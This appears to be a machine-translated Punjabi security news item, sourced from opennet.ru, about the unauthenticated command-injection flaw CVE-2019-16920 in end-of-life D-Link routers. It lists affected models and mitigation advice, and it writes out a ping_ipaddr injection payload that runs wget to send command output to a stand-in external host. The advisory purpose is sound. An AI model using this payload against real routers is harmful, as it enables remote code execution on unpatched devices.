ਡੀ-ਲਿੰਕ ਰਾਊਟਰਾਂ ਵਿੱਚ ਰਿਮੋਟਲੀ ਸ਼ੋਸ਼ਣਯੋਗ ਕਮਜ਼ੋਰੀ

ਡੀ-ਲਿੰਕ ਵਾਇਰਲੈੱਸ ਰਾਊਟਰਾਂ ਵਿੱਚ ਪਛਾਣ ਕੀਤੀ ਖ਼ਤਰਨਾਕ ਕਮਜ਼ੋਰੀ (CVE-2019–16920), ਜੋ ਤੁਹਾਨੂੰ "ਪਿੰਗ_ਟੈਸਟ" ਹੈਂਡਲਰ ਨੂੰ ਇੱਕ ਵਿਸ਼ੇਸ਼ ਬੇਨਤੀ ਭੇਜ ਕੇ ਡਿਵਾਈਸ ਸਾਈਡ 'ਤੇ ਰਿਮੋਟਲੀ ਕੋਡ ਨੂੰ ਚਲਾਉਣ ਦੀ ਆਗਿਆ ਦਿੰਦਾ ਹੈ, ਪ੍ਰਮਾਣਿਕਤਾ ਤੋਂ ਬਿਨਾਂ ਪਹੁੰਚਯੋਗ।

ਦਿਲਚਸਪ ਗੱਲ ਇਹ ਹੈ ਕਿ, ਫਰਮਵੇਅਰ ਡਿਵੈਲਪਰਾਂ ਦੇ ਅਨੁਸਾਰ, "ਪਿੰਗ_ਟੈਸਟ" ਕਾਲ ਨੂੰ ਪ੍ਰਮਾਣਿਕਤਾ ਤੋਂ ਬਾਅਦ ਹੀ ਚਲਾਇਆ ਜਾਣਾ ਚਾਹੀਦਾ ਹੈ, ਪਰ ਅਸਲ ਵਿੱਚ ਵੈੱਬ ਇੰਟਰਫੇਸ ਵਿੱਚ ਲੌਗਇਨ ਕਰਨ ਦੀ ਪਰਵਾਹ ਕੀਤੇ ਬਿਨਾਂ, ਇਸਨੂੰ ਕਿਸੇ ਵੀ ਸਥਿਤੀ ਵਿੱਚ ਬੁਲਾਇਆ ਜਾਂਦਾ ਹੈ. ਖਾਸ ਤੌਰ 'ਤੇ, apply_sec.cgi ਸਕ੍ਰਿਪਟ ਨੂੰ ਐਕਸੈਸ ਕਰਨ ਅਤੇ "action=ping_test" ਪੈਰਾਮੀਟਰ ਨੂੰ ਪਾਸ ਕਰਨ ਵੇਲੇ, ਸਕ੍ਰਿਪਟ ਪ੍ਰਮਾਣੀਕਰਨ ਪੰਨੇ 'ਤੇ ਰੀਡਾਇਰੈਕਟ ਕਰਦੀ ਹੈ, ਪਰ ਉਸੇ ਸਮੇਂ ping_test ਨਾਲ ਸੰਬੰਧਿਤ ਕਾਰਵਾਈ ਕਰਦੀ ਹੈ। ਕੋਡ ਨੂੰ ਚਲਾਉਣ ਲਈ, ਪਿੰਗ_ਟੈਸਟ ਵਿੱਚ ਇੱਕ ਹੋਰ ਕਮਜ਼ੋਰੀ ਵਰਤੀ ਗਈ ਸੀ, ਜੋ ਜਾਂਚ ਲਈ ਭੇਜੇ ਗਏ IP ਐਡਰੈੱਸ ਦੀ ਸਹੀ ਜਾਂਚ ਕੀਤੇ ਬਿਨਾਂ ਪਿੰਗ ਉਪਯੋਗਤਾ ਨੂੰ ਕਾਲ ਕਰਦੀ ਹੈ। ਉਦਾਹਰਨ ਲਈ, wget ਉਪਯੋਗਤਾ ਨੂੰ ਕਾਲ ਕਰਨ ਅਤੇ "echo 1234" ਕਮਾਂਡ ਦੇ ਨਤੀਜਿਆਂ ਨੂੰ ਇੱਕ ਬਾਹਰੀ ਹੋਸਟ ਵਿੱਚ ਟ੍ਰਾਂਸਫਰ ਕਰਨ ਲਈ, ਸਿਰਫ਼ "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" ਪੈਰਾਮੀਟਰ ਨਿਰਧਾਰਤ ਕਰੋ। test.test/?$( echo 1234)"।

ਹੇਠਲੇ ਮਾਡਲਾਂ ਵਿੱਚ ਕਮਜ਼ੋਰੀ ਦੀ ਮੌਜੂਦਗੀ ਦੀ ਅਧਿਕਾਰਤ ਤੌਰ 'ਤੇ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ ਹੈ:

• DIR-655 ਫਰਮਵੇਅਰ 3.02b05 ਜਾਂ ਪੁਰਾਣੇ ਨਾਲ;
• ਫਰਮਵੇਅਰ 866b1.03 ਜਾਂ ਪੁਰਾਣੇ ਨਾਲ DIR-04L;
• DIR-1565 ਫਰਮਵੇਅਰ 1.01 ਜਾਂ ਇਸ ਤੋਂ ਪੁਰਾਣੇ ਨਾਲ;
• DIR-652 (ਸਮੱਸਿਆ ਵਾਲੇ ਫਰਮਵੇਅਰ ਸੰਸਕਰਣਾਂ ਬਾਰੇ ਕੋਈ ਜਾਣਕਾਰੀ ਪ੍ਰਦਾਨ ਨਹੀਂ ਕੀਤੀ ਗਈ ਹੈ)

ਇਹਨਾਂ ਮਾਡਲਾਂ ਲਈ ਸਮਰਥਨ ਦੀ ਮਿਆਦ ਪਹਿਲਾਂ ਹੀ ਖਤਮ ਹੋ ਚੁੱਕੀ ਹੈ, ਇਸਲਈ ਡੀ-ਲਿੰਕ ਨੇ ਕਿਹਾ, ਜੋ ਕਮਜ਼ੋਰੀ ਨੂੰ ਖਤਮ ਕਰਨ ਲਈ ਉਹਨਾਂ ਲਈ ਅੱਪਡੇਟ ਜਾਰੀ ਨਹੀਂ ਕਰੇਗਾ, ਉਹਨਾਂ ਨੂੰ ਵਰਤਣ ਦੀ ਸਿਫਾਰਸ਼ ਨਹੀਂ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਨਵੇਂ ਡਿਵਾਈਸਾਂ ਨਾਲ ਬਦਲਣ ਦੀ ਸਲਾਹ ਦਿੰਦਾ ਹੈ। ਇੱਕ ਸੁਰੱਖਿਆ ਹੱਲ ਵਜੋਂ, ਤੁਸੀਂ ਵੈੱਬ ਇੰਟਰਫੇਸ ਤੱਕ ਪਹੁੰਚ ਨੂੰ ਸਿਰਫ਼ ਭਰੋਸੇਯੋਗ IP ਪਤਿਆਂ ਤੱਕ ਸੀਮਤ ਕਰ ਸਕਦੇ ਹੋ।

ਬਾਅਦ ਵਿੱਚ ਪਤਾ ਲੱਗਾ ਕਿ ਕਮਜ਼ੋਰੀ ਵੀ ਸੀ ਪ੍ਰਭਾਵਿਤ ਕਰਦਾ ਹੈ ਮਾਡਲ DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 ਅਤੇ DIR-825, ਅੱਪਡੇਟ ਜਾਰੀ ਕਰਨ ਦੀਆਂ ਯੋਜਨਾਵਾਂ ਜਿਨ੍ਹਾਂ ਲਈ ਅਜੇ ਪਤਾ ਨਹੀਂ ਹੈ।

ਸਰੋਤ: opennet.ru